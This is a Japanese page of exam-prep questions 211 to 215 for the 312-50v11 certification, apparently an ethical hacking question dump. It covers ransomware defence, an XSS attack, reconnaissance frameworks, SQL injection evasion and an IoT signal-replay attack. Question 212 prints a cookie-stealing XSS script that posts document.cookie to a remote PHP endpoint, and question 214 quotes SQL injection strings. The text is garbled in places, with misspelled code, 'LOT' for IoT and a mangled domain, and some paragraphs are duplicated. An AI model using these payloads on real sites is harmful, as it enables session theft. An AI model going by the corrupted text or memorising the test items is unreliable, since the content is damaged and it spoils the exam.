312-50v11 試験問題 211
ランサムウェアの暗号化に対する最善の対策は次のうちどれですか?
312-50v11 試験問題 212
ある日、ジュディはフォーラムを作成しました。彼女は、あるユーザーがコメントを書かずに奇妙な画像を投稿していることに気づきました。
彼女はすぐにセキュリティの専門家に電話しました。その専門家は、これらの画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+escape(document.cookie)+ " />); </script> 画像をクリックしたユーザーにどのような問題が発生しましたか?
彼女はすぐにセキュリティの専門家に電話しました。その専門家は、これらの画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+escape(document.cookie)+ " />); </script> 画像をクリックしたユーザーにどのような問題が発生しましたか?
312-50v11 試験問題 213
James は Technix Solutions で倫理ハッカーとして働いています。経営陣はジェームスに、自社のネットワークがフットプリント攻撃に対してどれほど脆弱かを調査するよう命じました。James は、自動偵察活動を実行するためにオープンソース フレームワークを利用しました。このフレームワークは、James が無料のツールとリソースを使用して情報を収集するのに役立ちました。ジェームズが足跡調査や偵察活動を行うために使用するフレームワークは何ですか?
312-50v11 試験問題 214
Daniel はプロのハッカーで、ターゲット Web サイトに対して SQL インジェクション攻撃を実行しようとしています。www.movlescope.com。このプロセス中に、事前定義された署名に基づいて SQL インジェクションの試行を検出する IDS に遭遇しました。比較ステートメントを回避するために、彼は「or 1=1」などのバスク注入ステートメントに「or '1'='1」などの文字を配置しようとしました。上記のシナリオでダニエルが使用した回避手法を特定してください。
312-50v11 試験問題 215
攻撃者のリチャードは、ターゲット ネットワークに接続されている LOT デバイスをハッキングすることを目的としていました。
このプロセスでは。リチャードは、接続されたデバイス間で情報を共有するために必要な頻度を記録しました。
周波数を取得した後、接続されたデバイスによってコマンドが開始されたときに元のデータをキャプチャしました。
元のデータが収集されると、URH などの無料ツールを使用してコマンド シーケンスを分離しました。その後、同じ周波数で分離されたコマンド シーケンスを LoT ネットワークに注入し始めました。LOT ネットワークは、デバイスのキャプチャされた信号を繰り返します。
上記のシナリオでリチャードが実行した攻撃の種類は何ですか?
このプロセスでは。リチャードは、接続されたデバイス間で情報を共有するために必要な頻度を記録しました。
周波数を取得した後、接続されたデバイスによってコマンドが開始されたときに元のデータをキャプチャしました。
元のデータが収集されると、URH などの無料ツールを使用してコマンド シーケンスを分離しました。その後、同じ周波数で分離されたコマンド シーケンスを LoT ネットワークに注入し始めました。LOT ネットワークは、デバイスのキャプチャされた信号を繰り返します。
上記のシナリオでリチャードが実行した攻撃の種類は何ですか?

